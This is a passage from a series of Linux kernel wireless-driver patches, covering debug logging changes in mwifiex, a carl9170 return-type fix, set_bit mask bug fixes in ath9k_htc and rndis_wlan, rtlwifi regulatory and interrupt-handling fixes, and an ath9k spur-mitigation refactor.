mwifiex_private *priv, if (!wmm_ie) return 0; - dev_dbg(priv->adapter->dev, - "info: WMM: process assoc req: bss->wmm_ie=%#x\n", - wmm_ie->vend_hdr.element_id); + mwifiex_dbg(priv->adapter, INFO, + "info: WMM: process assoc req: bss->wmm_ie=%#x\n", + wmm_ie->vend_hdr.element_id); if ((priv->wmm_required || (ht_cap && (priv->adapter->config_bands & BAND_GN || @@ -936,8 +941,8 @@ mwifiex_wmm_compute_drv_pkt_delay(struct mwifiex_private *priv, */ ret_val = (u8) (min(queue_delay, priv->wmm.drv_pkt_delay_max) >> 1); - dev_dbg(priv->adapter->dev, "data: WMM: Pkt Delay: %d ms," - " %d ms sent to FW\n", queue_delay, ret_val); + mwifiex_dbg(priv->adapter, DATA, "data: WMM: Pkt Delay: %d ms,\t" + "%d ms sent to FW\n", queue_delay, ret_val); return ret_val; } @@ -1091,14 +1096,15 @@ mwifiex_send_single_packet(struct mwifiex_private *priv, if (skb_queue_empty(&ptr->skb_head)) { spin_unlock_irqrestore(&priv->wmm.ra_list_spinlock, ra_list_flags); - dev_dbg(adapter->dev, "data: nothing to send\n"); + mwifiex_dbg(adapter, DATA, "data: nothing to send\n"); return; } skb = skb_dequeue(&ptr->skb_head); tx_info = MWIFIEX_SKB_TXCB(skb); - dev_dbg(adapter->dev, "data: dequeuing the packet %p %p\n", ptr, skb); + mwifiex_dbg(adapter, DATA, + "data: dequeuing the packet %p %p\n", ptr, skb); ptr->total_pkt_count--; @@ -1214,7 +1220,7 @@ mwifiex_send_processed_packet(struct mwifiex_private *priv, switch (ret) { case -EBUSY: - dev_dbg(adapter->dev, "data: -EBUSY is returned\n"); + mwifiex_dbg(adapter, ERROR, "data: -EBUSY is returned\n"); spin_lock_irqsave(&priv->wmm.ra_list_spinlock, ra_list_flags); if (!mwifiex_is_ralist_valid(priv, ptr, ptr_index)) { @@ -1233,7 +1239,7 @@ mwifiex_send_processed_packet(struct mwifiex_private *priv, case -1: if (adapter->iface_type != MWIFIEX_PCIE) adapter->data_sent = false; - dev_err(adapter->dev, "host_to_card failed: %#x\n", ret); + mwifiex_dbg(adapter, ERROR, "host_to_card failed: %#x\n", ret); adapter->dbg.num_tx_host_to_card_failure++; mwifiex_write_data_complete(adapter, skb, 0, ret); break; @@ -1272,7 +1278,7 @@ mwifiex_dequeue_tx_packet(struct mwifiex_adapter *adapter) tid = mwifiex_get_tid(ptr); - dev_dbg(adapter->dev, "data: tid=%d\n", tid); + mwifiex_dbg(adapter, DATA, "data: tid=%d\n", tid); spin_lock_irqsave(&priv->wmm.ra_list_spinlock, flags); if (!mwifiex_is_ralist_valid(priv, ptr, ptr_index)) { From 4b3e845a0927c5c660f38330522b8089edcd7c40 Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Tue, 12 May 2015 20:18:38 +0200 Subject: [PATCH 206/872] carl9170: match wait_for_completion_timeout return type Return type of wait_for_completion_timeout is unsigned long not int. An appropriately named unsigned long is added, and the assignments as well as error checking fixed up. API conformance testing for completions with coccinelle spatches are being used to locate API usage inconsistencies: ./drivers/net/wireless/ath/carl9170/usb.c:675 int return assigned to unsigned long Patch was compile tested with x86_64_defconfig + CONFIG_ATH_CARDS=m, CONFIG_CARL9170=m Patch is against 4.1-rc3 (localversion-next is -next-20150512) Signed-off-by: Nicholas Mc Guire Acked-by: Christian Lamparter Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/carl9170/usb.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/ath/carl9170/usb.c b/drivers/net/wireless/ath/carl9170/usb.c index c9f93310c0d6..76842e6ca38e 100644 --- a/drivers/net/wireless/ath/carl9170/usb.c +++ b/drivers/net/wireless/ath/carl9170/usb.c @@ -651,6 +651,7 @@ int carl9170_exec_cmd(struct ar9170 *ar, const enum carl9170_cmd_oids cmd, unsigned int plen, void *payload, unsigned int outlen, void *out) { int err = -ENOMEM; + unsigned long time_left; if (!IS_ACCEPTING_CMD(ar)) return -EIO; @@ -672,8 +673,8 @@ int carl9170_exec_cmd(struct ar9170 *ar, const enum carl9170_cmd_oids cmd, err = __carl9170_exec_cmd(ar, &ar->cmd, false); if (!(cmd & CARL9170_CMD_ASYNC_FLAG)) { - err = wait_for_completion_timeout(&ar->cmd_wait, HZ); - if (err == 0) { + time_left = wait_for_completion_timeout(&ar->cmd_wait, HZ); + if (time_left == 0) { err = -ETIMEDOUT; goto err_unbuf; } From 22f44150aad7a1d6b074ab6cf59abee61c7187c6 Mon Sep 17 00:00:00 2001 From: Arnd Bergmann Date: Tue, 12 May 2015 23:54:25 +0200 Subject: [PATCH 207/872] brcmfmac: avoid gcc-5.1 warning gcc-5.0 gained a new warning in the fwsignal portion of the brcmfmac driver: drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c: In function 'brcmf_fws_txs_process': drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c:1478:8: warning: 'skb' may be used uninitialized in this function [-Wmaybe-uninitialized] This is a false positive, and marking the brcmf_fws_hanger_poppkt function as 'static inline' makes the warning go away. I have checked the object file output and while a little code gets moved around, the size of the binary remains identical. Signed-off-by: Arnd Bergmann Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c b/drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c index f0dda0ecd23b..5017eaa4af45 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/fwsignal.c @@ -635,7 +635,7 @@ static int brcmf_fws_hanger_pushpkt(struct brcmf_fws_hanger *h, return 0; } -static int brcmf_fws_hanger_poppkt(struct brcmf_fws_hanger *h, +static inline int brcmf_fws_hanger_poppkt(struct brcmf_fws_hanger *h, u32 slot_id, struct sk_buff **pktout, bool remove_item) { From 191f1aeeb93bb58e56f4d1868294ae22f3f67d4e Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Thu, 14 May 2015 11:34:48 +0300 Subject: [PATCH 208/872] ath9k_htc: memory corruption calling set_bit() In d8a2c51cdcae ('ath9k_htc: Use atomic operations for op_flags') we changed things like this: - if (priv->op_flags & OP_TSF_RESET) { + if (test_bit(OP_TSF_RESET, &priv->op_flags)) { The problem is that test_bit() takes a bit number and not a mask. It means that when we do: set_bit(OP_TSF_RESET, &priv->op_flags); Then it sets the (1 << 6) bit instead of the 6 bit so we are setting a bit which is past the end of the unsigned long. Fixes: d8a2c51cdcae ('ath9k_htc: Use atomic operations for op_flags') Signed-off-by: Dan Carpenter Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath9k/htc.h | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/net/wireless/ath/ath9k/htc.h b/drivers/net/wireless/ath/ath9k/htc.h index e82a0d4ce23f..5dbc617ecf8a 100644 --- a/drivers/net/wireless/ath/ath9k/htc.h +++ b/drivers/net/wireless/ath/ath9k/htc.h @@ -440,9 +440,9 @@ static inline void ath9k_htc_stop_btcoex(struct ath9k_htc_priv *priv) } #endif /* CONFIG_ATH9K_BTCOEX_SUPPORT */ -#define OP_BT_PRIORITY_DETECTED BIT(3) -#define OP_BT_SCAN BIT(4) -#define OP_TSF_RESET BIT(6) +#define OP_BT_PRIORITY_DETECTED 3 +#define OP_BT_SCAN 4 +#define OP_TSF_RESET 6 enum htc_op_flags { HTC_FWFLAG_NO_RMW, From e3958e9d60b4570fff709f397ef5c6b8483f40f7 Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Thu, 14 May 2015 11:37:50 +0300 Subject: [PATCH 209/872] rndis_wlan: harmless issue calling set_bit() These are used like: set_bit(WORK_LINK_UP, &priv->work_pending); The problem is that set_bit() takes the actual bit number and not a mask so static checkers get upset. It doesn't affect run time because we do it consistently, but we may as well clean it up. Fixes: 6010ce07a66c ('rndis_wlan: do link-down state change in worker thread') Signed-off-by: Dan Carpenter Signed-off-by: Kalle Valo --- drivers/net/wireless/rndis_wlan.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/net/wireless/rndis_wlan.c b/drivers/net/wireless/rndis_wlan.c index d72ff8e7125d..96175a7af165 100644 --- a/drivers/net/wireless/rndis_wlan.c +++ b/drivers/net/wireless/rndis_wlan.c @@ -356,9 +356,9 @@ struct ndis_80211_pmkid { #define CAP_MODE_80211G 4 #define CAP_MODE_MASK 7 -#define WORK_LINK_UP (1<<0) -#define WORK_LINK_DOWN (1<<1) -#define WORK_SET_MULTICAST_LIST (1<<2) +#define WORK_LINK_UP 0 +#define WORK_LINK_DOWN 1 +#define WORK_SET_MULTICAST_LIST 2 #define RNDIS_WLAN_ALG_NONE 0 #define RNDIS_WLAN_ALG_WEP (1<<0) From 02b5fffbe9e02f5d63fa4a801fb807cf0aab4fc9 Mon Sep 17 00:00:00 2001 From: Shao Fu Date: Fri, 15 May 2015 16:32:59 -0500 Subject: [PATCH 210/872] rtlwifi: Update regulatory database Driver rtlwifi maintains its own regulatory information, The Chrome Autotest (https://www.chromium.org/chromium-os/testing/autotest-user-doc) showed some errors. This patch adds the necessary information for rtlwifi. Signed-off-by: Shao Fu Signed-off-by: Larry Finger Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/regd.c | 42 ++++++++++++++++++++++++++--- drivers/net/wireless/rtlwifi/regd.h | 1 + 2 files changed, 39 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/regd.c b/drivers/net/wireless/rtlwifi/regd.c index 1893d01b9e78..a62bf0a65c32 100644 --- a/drivers/net/wireless/rtlwifi/regd.c +++ b/drivers/net/wireless/rtlwifi/regd.c @@ -40,6 +40,7 @@ static struct country_code_to_enum_rd allCountries[] = { {COUNTRY_CODE_GLOBAL_DOMAIN, "JP"}, {COUNTRY_CODE_WORLD_WIDE_13, "EC"}, {COUNTRY_CODE_TELEC_NETGEAR, "EC"}, + {COUNTRY_CODE_WORLD_WIDE_13_5G_ALL, "US"}, }; /* @@ -124,6 +125,17 @@ static const struct ieee80211_regdomain rtl_regdom_14_60_64 = { } }; +static const struct ieee80211_regdomain rtl_regdom_12_13_5g_all = { + .n_reg_rules = 4, + .alpha2 = "99", + .reg_rules = { + RTL819x_2GHZ_CH01_11, + RTL819x_2GHZ_CH12_13, + RTL819x_5GHZ_5150_5350, + RTL819x_5GHZ_5470_5850, + } +}; + static const struct ieee80211_regdomain rtl_regdom_14 = { .n_reg_rules = 3, .alpha2 = "99", @@ -348,6 +360,8 @@ static const struct ieee80211_regdomain *_rtl_regdomain_select( return &rtl_regdom_14_60_64; case COUNTRY_CODE_GLOBAL_DOMAIN: return &rtl_regdom_14; + case COUNTRY_CODE_WORLD_WIDE_13_5G_ALL: + return &rtl_regdom_12_13_5g_all; default: return &rtl_regdom_no_midband; } @@ -384,6 +398,25 @@ static struct country_code_to_enum_rd *_rtl_regd_find_country(u16 countrycode) return NULL; } +static u8 channel_plan_to_country_code(u8 channelplan) +{ + switch (channelplan) { + case 0x20: + case 0x21: + return COUNTRY_CODE_WORLD_WIDE_13; + case 0x22: + return COUNTRY_CODE_IC; + case 0x32: + return COUNTRY_CODE_TELEC_NETGEAR; + case 0x41: + return COUNTRY_CODE_GLOBAL_DOMAIN; + case 0x7f: + return COUNTRY_CODE_WORLD_WIDE_13_5G_ALL; + default: + return COUNTRY_CODE_MAX; /*Error*/ + } +} + int rtl_regd_init(struct ieee80211_hw *hw, void (*reg_notifier)(struct wiphy *wiphy, struct regulatory_request *request)) @@ -396,11 +429,12 @@ int rtl_regd_init(struct ieee80211_hw *hw, return -EINVAL; /* init country_code from efuse channel plan */ - rtlpriv->regd.country_code = rtlpriv->efuse.channel_plan; + rtlpriv->regd.country_code = + channel_plan_to_country_code(rtlpriv->efuse.channel_plan); - RT_TRACE(rtlpriv, COMP_REGD, DBG_TRACE, - "rtl: EEPROM regdomain: 0x%0x\n", - rtlpriv->regd.country_code); + RT_TRACE(rtlpriv, COMP_REGD, DBG_DMESG, + "rtl: EEPROM regdomain: 0x%0x conuntry code: %d\n", + rtlpriv->efuse.channel_plan, rtlpriv->regd.country_code); if (rtlpriv->regd.country_code >= COUNTRY_CODE_MAX) { RT_TRACE(rtlpriv, COMP_REGD, DBG_DMESG, diff --git a/drivers/net/wireless/rtlwifi/regd.h b/drivers/net/wireless/rtlwifi/regd.h index 3bbbaaa68530..f7f15bce35dd 100644 --- a/drivers/net/wireless/rtlwifi/regd.h +++ b/drivers/net/wireless/rtlwifi/regd.h @@ -49,6 +49,7 @@ enum country_code_type_t { COUNTRY_CODE_GLOBAL_DOMAIN = 10, COUNTRY_CODE_WORLD_WIDE_13 = 11, COUNTRY_CODE_TELEC_NETGEAR = 12, + COUNTRY_CODE_WORLD_WIDE_13_5G_ALL = 13, /*add new channel plan above this line */ COUNTRY_CODE_MAX From 852ce7805638e3202578b6265b40bfe36b20c1c4 Mon Sep 17 00:00:00 2001 From: Shao Fu Date: Fri, 15 May 2015 16:33:00 -0500 Subject: [PATCH 211/872] rtlwifi: rtl8188ee: Apply the new regulatory information The driver was setting a channel plan for the world. Now it reads it from EEPROM. Signed-off-by: Shao Fu Signed-off-by: Larry Finger Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8188ee/hw.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c b/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c index 86ce5b1930e6..40c65b742b61 100644 --- a/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c @@ -1919,8 +1919,8 @@ static void _rtl88ee_read_adapter_info(struct ieee80211_hw *hw) "dev_addr: %pM\n", rtlefuse->dev_addr); /*channel plan */ rtlefuse->eeprom_channelplan = hwinfo[EEPROM_CHANNELPLAN]; - /* set channel paln to world wide 13 */ - rtlefuse->channel_plan = COUNTRY_CODE_WORLD_WIDE_13; + /* set channel plan from efuse */ + rtlefuse->channel_plan = rtlefuse->eeprom_channelplan; /*tx power*/ _rtl88ee_read_txpower_info_from_hwpg(hw, rtlefuse->autoload_failflag, From 5620302484d4ef71be0361bea086770d24a73e47 Mon Sep 17 00:00:00 2001 From: Shao Fu Date: Fri, 15 May 2015 16:33:01 -0500 Subject: [PATCH 212/872] rtlwifi: rtl8192ee: Apply the regulatory changes to driver The driver was setting a channel plan for the world. Now it reads it fromi EEPROM. In addition, a typo was fixed. Signed-off-by: Shao Fu Signed-off-by: Larry Finger Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8192ee/hw.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c b/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c index da0a6125f314..0705e7e3def0 100644 --- a/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c @@ -2194,8 +2194,8 @@ static void _rtl92ee_read_adapter_info(struct ieee80211_hw *hw) "dev_addr: %pM\n", rtlefuse->dev_addr); /*channel plan */ rtlefuse->eeprom_channelplan = *(u8 *)&hwinfo[EEPROM_CHANNELPLAN]; - /* set channel paln to world wide 13 */ - rtlefuse->channel_plan = COUNTRY_CODE_WORLD_WIDE_13; + /* set channel plan from efuse */ + rtlefuse->channel_plan = rtlefuse->eeprom_channelplan; /*tx power*/ _rtl92ee_read_txpower_info_from_hwpg(hw, rtlefuse->autoload_failflag, hwinfo); From b23cd22d3923b11e4a8fd1854b52932ac691d7ac Mon Sep 17 00:00:00 2001 From: Shao Fu Date: Fri, 15 May 2015 16:33:02 -0500 Subject: [PATCH 213/872] rtlwifi: rtl8723be: Update driver for regulatory changes The driver is converted to use the channel plan in the EEPROM. Signed-off-by: Shao Fu Signed-off-by: Larry Finger Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8723be/hw.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8723be/hw.c b/drivers/net/wireless/rtlwifi/rtl8723be/hw.c index b681af3c7a35..e0f679bbcdaf 100644 --- a/drivers/net/wireless/rtlwifi/rtl8723be/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8723be/hw.c @@ -2139,8 +2139,8 @@ static void _rtl8723be_read_adapter_info(struct ieee80211_hw *hw, RT_TRACE(rtlpriv, COMP_INIT, DBG_LOUD, "EEPROM Customer ID: 0x%2x\n", rtlefuse->eeprom_oemid); - /* set channel plan to world wide 13 */ - rtlefuse->channel_plan = COUNTRY_CODE_WORLD_WIDE_13; + /* set channel plan from efuse */ + rtlefuse->channel_plan = rtlefuse->eeprom_channelplan; if (rtlhal->oem_id == RT_CID_DEFAULT) { /* Does this one have a Toshiba SMID from group 1? */ From d10101a603727474eb7ee16c1b46dcb4931a2dac Mon Sep 17 00:00:00 2001 From: Shao Fu Date: Fri, 15 May 2015 16:33:03 -0500 Subject: [PATCH 214/872] rtlwifi: rtl8821ae: Fix problem with regulatory information The driver was not setting a channel plan. Now it gets it from EEPROM. Signed-off-by: Shao Fu Signed-off-by: Larry Finger Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8821ae/hw.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c b/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c index 8704eee9f3a4..450bd4d743d0 100644 --- a/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c @@ -3232,8 +3232,8 @@ static void _rtl8821ae_read_adapter_info(struct ieee80211_hw *hw, bool b_pseudo_ if (rtlefuse->eeprom_channelplan == 0xff) rtlefuse->eeprom_channelplan = 0x7F; - /* set channel paln to world wide 13 */ - /* rtlefuse->channel_plan = (u8)rtlefuse->eeprom_channelplan; */ + /* set channel plan from efuse */ + rtlefuse->channel_plan = rtlefuse->eeprom_channelplan; /*parse xtal*/ rtlefuse->crystalcap = hwinfo[EEPROM_XTAL_8821AE]; From 1277fa2ab2f9a624a4b0177119ca13b5fd65edd0 Mon Sep 17 00:00:00 2001 From: Vincent Fann Date: Fri, 15 May 2015 21:29:27 -0500 Subject: [PATCH 215/872] rtlwifi: Remove the clear interrupt routine from all drivers Several of these drivers have there TX randomly blocked for 3~5 seconds while measuring tx throughput (iperf). The root couse happens in rtl_pci_flush(). The function uses a while-loop to wait for TX queue length to decrease to 0. The TX queue length counts the number of packets that are queued in the driver. The driver relys on the TX OK interrupt to return skb and reduce TX queue length. The interrupt subroutine disables interupts, reads the interrupt registers, and then clears the registers in the beginning of _rtl_pci_interrupt(). After all interupts process are finished, the driver invokes enable_interrupt() to enable interupts. This behavior is normal for an interrupt subroutine. But enable_interrupt() invokes clear_interrupt() again. This unexpected interrupt clearing may cleari me fresh TX OK interrupts. These missing interrupts cause TX queue length to never reduce to 0i, which causes rtl_pci_flush() to be stuck in unterminated while-loop. This patch removes clear_interrupt() in enable_interrupt() to avoid this behavior. Signed-off-by: Vincent Fann Signed-off-by: Shao Fu Signed-off-by: Larry Finger Cc: Stable [3.18+] Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8188ee/hw.c | 16 ---------------- drivers/net/wireless/rtlwifi/rtl8192ee/hw.c | 17 ----------------- drivers/net/wireless/rtlwifi/rtl8723ae/hw.c | 13 ------------- drivers/net/wireless/rtlwifi/rtl8723be/hw.c | 17 ----------------- drivers/net/wireless/rtlwifi/rtl8821ae/hw.c | 20 -------------------- 5 files changed, 83 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c b/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c index 40c65b742b61..8ee83b093c0d 100644 --- a/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8188ee/hw.c @@ -1354,27 +1354,11 @@ void rtl88ee_set_qos(struct ieee80211_hw *hw, int aci) } } -static void rtl88ee_clear_interrupt(struct ieee80211_hw *hw) -{ - struct rtl_priv *rtlpriv = rtl_priv(hw); - u32 tmp; - - tmp = rtl_read_dword(rtlpriv, REG_HISR); - rtl_write_dword(rtlpriv, REG_HISR, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HISRE); - rtl_write_dword(rtlpriv, REG_HISRE, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HSISR); - rtl_write_dword(rtlpriv, REG_HSISR, tmp); -} - void rtl88ee_enable_interrupt(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw)); - rtl88ee_clear_interrupt(hw);/*clear it here first*/ rtl_write_dword(rtlpriv, REG_HIMR, rtlpci->irq_mask[0] & 0xFFFFFFFF); rtl_write_dword(rtlpriv, REG_HIMRE, diff --git a/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c b/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c index 0705e7e3def0..5f14308e8eb3 100644 --- a/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8192ee/hw.c @@ -1584,28 +1584,11 @@ void rtl92ee_set_qos(struct ieee80211_hw *hw, int aci) } } -static void rtl92ee_clear_interrupt(struct ieee80211_hw *hw) -{ - struct rtl_priv *rtlpriv = rtl_priv(hw); - u32 tmp; - - tmp = rtl_read_dword(rtlpriv, REG_HISR); - rtl_write_dword(rtlpriv, REG_HISR, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HISRE); - rtl_write_dword(rtlpriv, REG_HISRE, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HSISR); - rtl_write_dword(rtlpriv, REG_HSISR, tmp); -} - void rtl92ee_enable_interrupt(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw)); - rtl92ee_clear_interrupt(hw);/*clear it here first*/ - rtl_write_dword(rtlpriv, REG_HIMR, rtlpci->irq_mask[0] & 0xFFFFFFFF); rtl_write_dword(rtlpriv, REG_HIMRE, rtlpci->irq_mask[1] & 0xFFFFFFFF); rtlpci->irq_enabled = true; diff --git a/drivers/net/wireless/rtlwifi/rtl8723ae/hw.c b/drivers/net/wireless/rtlwifi/rtl8723ae/hw.c index 67bb47d77b68..a4b7eac6856f 100644 --- a/drivers/net/wireless/rtlwifi/rtl8723ae/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8723ae/hw.c @@ -1258,18 +1258,6 @@ void rtl8723e_set_qos(struct ieee80211_hw *hw, int aci) } } -static void rtl8723e_clear_interrupt(struct ieee80211_hw *hw) -{ - struct rtl_priv *rtlpriv = rtl_priv(hw); - u32 tmp; - - tmp = rtl_read_dword(rtlpriv, REG_HISR); - rtl_write_dword(rtlpriv, REG_HISR, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HISRE); - rtl_write_dword(rtlpriv, REG_HISRE, tmp); -} - void rtl8723e_enable_interrupt(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); @@ -1284,7 +1272,6 @@ void rtl8723e_disable_interrupt(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw)); - rtl8723e_clear_interrupt(hw);/*clear it here first*/ rtl_write_dword(rtlpriv, 0x3a8, IMR8190_DISABLED); rtl_write_dword(rtlpriv, 0x3ac, IMR8190_DISABLED); rtlpci->irq_enabled = false; diff --git a/drivers/net/wireless/rtlwifi/rtl8723be/hw.c b/drivers/net/wireless/rtlwifi/rtl8723be/hw.c index e0f679bbcdaf..c983d2fe147f 100644 --- a/drivers/net/wireless/rtlwifi/rtl8723be/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8723be/hw.c @@ -1634,28 +1634,11 @@ void rtl8723be_set_qos(struct ieee80211_hw *hw, int aci) } } -static void rtl8723be_clear_interrupt(struct ieee80211_hw *hw) -{ - struct rtl_priv *rtlpriv = rtl_priv(hw); - u32 tmp; - - tmp = rtl_read_dword(rtlpriv, REG_HISR); - rtl_write_dword(rtlpriv, REG_HISR, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HISRE); - rtl_write_dword(rtlpriv, REG_HISRE, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HSISR); - rtl_write_dword(rtlpriv, REG_HSISR, tmp); -} - void rtl8723be_enable_interrupt(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw)); - rtl8723be_clear_interrupt(hw);/*clear it here first*/ - rtl_write_dword(rtlpriv, REG_HIMR, rtlpci->irq_mask[0] & 0xFFFFFFFF); rtl_write_dword(rtlpriv, REG_HIMRE, rtlpci->irq_mask[1] & 0xFFFFFFFF); rtlpci->irq_enabled = true; diff --git a/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c b/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c index 450bd4d743d0..3236d44b459d 100644 --- a/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8821ae/hw.c @@ -2253,31 +2253,11 @@ void rtl8821ae_set_qos(struct ieee80211_hw *hw, int aci) } } -static void rtl8821ae_clear_interrupt(struct ieee80211_hw *hw) -{ - struct rtl_priv *rtlpriv = rtl_priv(hw); - u32 tmp; - tmp = rtl_read_dword(rtlpriv, REG_HISR); - /*printk("clear interrupt first:\n"); - printk("0x%x = 0x%08x\n",REG_HISR, tmp);*/ - rtl_write_dword(rtlpriv, REG_HISR, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HISRE); - /*printk("0x%x = 0x%08x\n",REG_HISRE, tmp);*/ - rtl_write_dword(rtlpriv, REG_HISRE, tmp); - - tmp = rtl_read_dword(rtlpriv, REG_HSISR); - /*printk("0x%x = 0x%08x\n",REG_HSISR, tmp);*/ - rtl_write_dword(rtlpriv, REG_HSISR, tmp); -} - void rtl8821ae_enable_interrupt(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw)); - rtl8821ae_clear_interrupt(hw);/*clear it here first*/ - rtl_write_dword(rtlpriv, REG_HIMR, rtlpci->irq_mask[0] & 0xFFFFFFFF); rtl_write_dword(rtlpriv, REG_HIMRE, rtlpci->irq_mask[1] & 0xFFFFFFFF); rtlpci->irq_enabled = true; From f911085ffa8863c62344876e0ab6073e4258c246 Mon Sep 17 00:00:00 2001 From: Oleksij Rempel Date: Sun, 17 May 2015 21:49:19 +0200 Subject: [PATCH 216/872] ath9k: split ar5008_hw_spur_mitigate and reuse common code in ar9002_hw_spur_mitigate. [ar5008 and ar9002]_hw_spur_mitigate have big portion of identical code. This patch will move common part of ar5008_hw_spur_mitigate to ar5008_hw_cmn_spur_mitigate and reuse it in ar9002_hw_spur_mitigate. As noticed by Joe Perches I reuse ar9002_hw_spur_mitigate (const) version of declarations for pilot_mask_reg and chan_mask_reg. There should be no other difference with original code. Signed-off-by: Oleksij Rempel Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath9k/ar5008_phy.c | 155 +++++++++++--------- drivers/net/wireless/ath/ath9k/ar9002_phy.c | 144 +----------------- drivers/net/wireless/ath/ath9k/hw.h | 2 + 3 files changed, 87 insertions(+), 214 deletions(-) diff --git a/drivers/net/wireless/ath/ath9k/ar5008_phy.c b/drivers/net/wireless/ath/ath9k/ar5008_phy.c index 6c23d279525f..8f8793004b9f 100644 --- a/drivers/net/wireless/ath/ath9k/ar5008_phy.c +++ b/drivers/net/wireless/ath/ath9k/ar5008_phy.c @@ -254,86 +254,25 @@ static int ar5008_hw_set_channel(struct ath_hw *ah, struct ath9k_channel *chan) return 0; } -/** - * ar5008_hw_spur_mitigate - convert baseband spur frequency for external radios - * @ah: atheros hardware structure - * @chan: - * - * For non single-chip solutions. Converts to baseband spur frequency given the - * input channel frequency and compute register settings below. - */ -static void ar5008_hw_spur_mitigate(struct ath_hw *ah, - struct ath9k_channel *chan) +void ar5008_hw_cmn_spur_mitigate(struct ath_hw *ah, + struct ath9k_channel *chan, int bin) { - int bb_spur = AR_NO_SPUR; - int bin, cur_bin; - int spur_freq_sd; - int spur_delta_phase; - int denominator; + int cur_bin; int upper, lower, cur_vit_mask; - int tmp, new; int i; - static int pilot_mask_reg[4] = { + int8_t mask_m[123]; + int8_t mask_p[123]; + int8_t mask_amt; + int tmp_mask; + static const int pilot_mask_reg[4] = { AR_PHY_TIMING7, AR_PHY_TIMING8, AR_PHY_PILOT_MASK_01_30, AR_PHY_PILOT_MASK_31_60 }; - static int chan_mask_reg[4] = { + static const int chan_mask_reg[4] = { AR_PHY_TIMING9, AR_PHY_TIMING10, AR_PHY_CHANNEL_MASK_01_30, AR_PHY_CHANNEL_MASK_31_60 }; - static int inc[4] = { 0, 100, 0, 0 }; - - int8_t mask_m[123]; - int8_t mask_p[123]; - int8_t mask_amt; - int tmp_mask; - int cur_bb_spur; - bool is2GHz = IS_CHAN_2GHZ(chan); - - memset(&mask_m, 0, sizeof(int8_t) * 123); - memset(&mask_p, 0, sizeof(int8_t) * 123); - - for (i = 0; i < 